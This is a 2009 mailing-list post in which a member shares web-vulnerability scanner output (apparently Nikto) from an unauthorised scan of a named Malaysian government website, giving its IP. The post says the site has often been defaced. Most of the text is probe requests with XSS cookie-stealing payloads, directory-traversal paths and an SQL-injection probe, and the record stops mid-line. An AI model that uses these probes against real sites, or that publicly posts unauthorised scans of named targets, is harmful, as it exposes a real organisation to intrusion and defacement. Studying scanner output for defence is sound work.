[PCBSD-malaysia] Government Web Vulnerable?
Mohd Fazli Azran Abd Malek
mfazliazran at gmail.com
Thu Sep 3 10:29:05 PDT 2009
Hi everyone,
I scan one website that maybe someone interested. When i see this
server it not weird that this web was many time got deface... i share
with you all this web. This is one of the government website that i
scan have many vulnerable and hope others will know and learn how
injection and exploit can be use to application and system. Here the
report of my scan:
---------------------------------------------------------------------------
+ Target IP: 202.186.96.231
+ Target Hostname: www.mardi.gov.my
+ Target Port: 80
+ Start Time: 2009-09-05 1:01:01
---------------------------------------------------------------------------
+ Server: lighttpd/1.5.0
+ No CGI Directories found (use '-C all' to force check all possible
dirs)
- Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-0: GET /help/ : Help directory should not be accessible
+ OSVDB-0: GET /vgn/jsp/jspstatus56 : Vignette CMS admin/maintenance
script available.
+ OSVDB-0: GET /typo3conf/ : This may contain sensitive Typo3 files.
+ OSVDB-0: GET /mysql/db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /3rdparty/phpMyAdmin/db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /phpMyAdmin/db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-0: GET /SUNWmc/htdocs/ : Sun SMC (Solaris Management Console)
is running.
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</
title><script>alert(document.cookie)</script> : Mambo PHP Portal/
Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?
option=search&searchword=<script>alert(document.cookie);</script> :
Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailnews.php?id=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&choice=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/view.php?path=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?dir=<script>alert('Vulnerable')</script> :
Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-0: GET /https-admserv/bin/index?/
<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1
administration control is vulnerable to XSS attacks.
+ OSVDB-0: GET /clusterframe.jsp?
cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x
JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</
script> : Mambo PHP Portal/Server is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</
script> : The PHP script soinfo.php is vulnerable to Cross Site
Scripting Set expose_php = Off in php.ini.
+ OSVDB-0: GET /servlet/MsgPage?
action=test&msg=<script>alert('Vulnerable')</script> : NetDetector 3.0
and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /servlets/MsgPage?
action=badlogin&msg=<script>alert('Vulnerable')</script> : The
NetDetector install is vulnerable to Cross Site Scripting (XSS) in
it's invalid login message. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de
%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?
tab1=TabsWebServer%26tab2=TabsWebLogSettings
%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=
\"><script>alert(document.cookie)</script> : IIS 6 on Windows 2003 is
vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=
\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to
Cross Site Scripting
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?
\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to
Cross Site Scripting
+ OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall
catinfo script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /templates/form_header.php?
noticemsg=<script>javascript:alert(document.cookie)</script> :
MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /supporter/index.php?
t=updateticketlog&id=<script><script>alert('Vulnerable')</
script></script> : MyHelpdesk from http://myhelpdesk.sourceforge.net/
versions v20020509 and older are vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?
t=tickettime&id=<script><script>alert('Vulnerable')</script></
script> : MyHelpdesk from http://myhelpdesk.sourceforge.net/
versions v20020509 and older are vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?
t=ticketfiles&id=<script><script>alert('Vulnerable')</
script></script> : MyHelpdesk from http://myhelpdesk.sourceforge.net/
versions v20020509 and older are vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /sunshop.index.php?
action=storenew&username=<script>alert('Vulnerable')</script> :
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup
page. CA-200-02.
+ OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</
script>&story=<script>alert('Vulnerable')</
script>&storyext=<script>alert('Vulnerable')</script>&op=Preview :
This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</
script> : Actinic E-Commerce services is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</
script>&page=list_users&user=P : CiscoSecure ACS v3.0(1) Build 40
allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable
\")</script> : Bajie HTTP JServer is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: POST /servlet/CookieExample?
cookiename=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /servlet/ContentServer?
pagename=<script>alert('Vulnerable')</script> : Open Market
Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the
login-error page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</
script> : Search agent allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</
script> : Wrensoft Zoom Search Engine is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.php?
searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the
latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</
script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</
script> : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error
pages (only some browsers will render this). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /replymsg.php?
send=1&destin=<script>alert('Vulnerable')</script> : This version of
PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B
%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 : Web
Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?
module
=
search
&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</
script> : phpWebSite 0.9.x and below are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?
module
=
pagemaster
&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</
script>&MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phpwebsite/index.php?
module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+
\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below
are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phpwebsite/index.php?
module=calendar&calendar[view]=day&month=2&year=2003&day=1+
%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and
below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</
script> : PHPNuke add-on PHPToNuke is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</
script> : Contains PHP configuration information and is vulnerable to
Cross Site Scripting (XSS).
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</
script> : Contains PHP configuration information and is vulnerable to
Cross Site Scripting (XSS).
+ OSVDB-0: GET /phpBB/viewtopic.php?
topic_id=<script>alert('Vulnerable')</script> : phpBB is vulnerable to
Cross Site Scripting (XSS), upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\">
\"<script>javascript:alert(document.cookie)</script> : phpBB is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phorum/admin/header.php?
GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a
and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phorum/admin/footer.php?
GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a
and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /netutils/whodata.stm?
sitename=<script>alert(document.cookie)</script> : Sambar Server
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /nav/cList.php?root=</
script><script>alert('Vulnerable')/<script> : RaQ3 server script is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /myphpnuke/links.php?
op=search&query=[script]alert('Vulnerable);[/script]?query= :
myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /myphpnuke/links.php?
op=MostPopular&ratenum=[script]alert(document.cookie);[/
script]&ratetype=percent : myphpnuke is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myhome.php?
action=messages&box=<script>alert('Vulnerable')</script> : OpenBB
1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /msadm/user/login.php3?account_name=
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site
User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /msadm/site/index.php3?authid=
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site
Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site
Domain Administrator login is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Submit/index.php?
op=pre&title=<script>alert(document.cookie);</script> : Basit cms 1.0
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></
style><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?
name=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?
Default_Theme=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=
\"><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
op
=
modload
&name
=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</
script> : The XForum (PHPNuke Add-on module) is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op=modload&name=Xforum&file=<script>alert('Vulnerable')</
script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</
script> : Wiki PostNuke Module is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op
=
modload
&name
=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op
=
modload
&name=Members_List&file=index&letter=<script>alert('Vulnerable')</
script> : This install of PHPNuke's modules.php is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op
=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg
%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post Nuke
0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
op
=
modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</
script> : The DMOZGateway (PHPNuke Add-on module) is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
name
=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</
script> : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
name=Surveys&pollID=<script>alert('Vulnerable')</script> : The PHPNuke
forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</
script>&month=3&month_l=test : The PHPNuke forum is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
name
=
Stories_Archive
&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
name
=
Downloads
&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</
script> : This install of PHPNuke is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
name
=
Classifieds
&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg
%20src=javascript:alert(document.cookie);
%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3-
Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x()
{v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</
script> : Megabook guestbook is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?
Action=<script>alert(\"Vulnerable\")</script> : IBM Directory Server
4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.
+ OSVDB-0: GET /launch.jsp?
NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is
vulnerable to cross site scripting (XSS) in the GetLastError function.
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /launch.asp?
NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is
vulnerable to cross site scripting (XSS) in the GetLastError function.
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /isapi/testisa.dll?
check1=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?file=Liens&op=
\"><script>alert('Vulnerable');</script> : Nuked-klan 1.3b is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?
action=storenew&username=<script>alert('Vulnerable')</script> :
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup
page. CA-200-02.
+ OSVDB-0: GET /index.php/content/search/?
SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ
publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php/content/advancedsearch/?
SearchText=<script>alert(document.cookie)</
script>&PhraseSearchText=<script>alert(document.cookie)</
script
>
&SearchContentClassID
=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish
v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /gallery/search.php?
searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the
latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /friend.php?
op=SiteSent&fname=<script>alert('Vulnerable')</script> : This version
of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS).
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /forum_members.asp?find=
%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver.
7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /forums/index.php?
board
=
;action
=
login2
&user
=
USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</
script> : YaBB is vulnerable to Cross Site Scripting (XSS) in the
password field of the login page. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</
script>; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is
vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /download.php?
sortby=&dcategory=<script>alert('Vulnerable')</script> : This version
of PHP-Nuke's download.php is vulnerable to Cross Site Scripting
(XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</
script>&comment=<script>alert('Vulnerable')</
script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of
PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS).
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /cleartrust/ct_logon.asp?
CTLoginErrorMsg=<script>alert(1)</script> : RSA ClearTrust allows
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?
query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?
query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</
script>&month=03&day=05 : DCP-Portal v5.3.1 is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=
\"><script>alert('Vulnerable')</script> : Actinic E-Commerce services
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop=
\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f : Actinic E-
Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</
script> : With malformed URLS, Coldfusion is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /apps/web/vs_diag.cgi?
server=<script>alert('Vulnerable')</script> : Zeus 4.2r2
(webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /addressbook/index.php?
surname=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /addressbook/index.php?
name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is
vulnerable to Cross Site Scripting (XSS) in the error message if code
is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-9239: GET /mailman/admin/ml-name?
\"><script>alert('Vulnerable')</script>; : Mailmain is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3092: GET /sitemap.xml : This gives a nice listing of the site
content.
+ OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25497: GET /index.php?rep=<script>alert(document.cookie)</
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-19947: GET /apps/web/index.fcgi?
servers=§ion=<script>alert(document.cookie)</script> : Zeus Admin
server 4.1r2 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-12606: GET /index.php?err=3&email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /forgot_password.php?email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12606: GET /bugs/index.php?err=3&email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /bugs/forgot_password.php?email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12606: GET /eventum/index.php?err=3&email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /eventum/forgot_password.php?email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-2119: GET /shopexd.asp?catalogid='42 : VP-ASP Shopping Cart
5.0 contains multiple SQL injection vulnerabilities. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0560
, http://www.securityfocus.com/bid/8159
+ OSVDB-2562: GET /login/sm_login_screen.php?error=
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
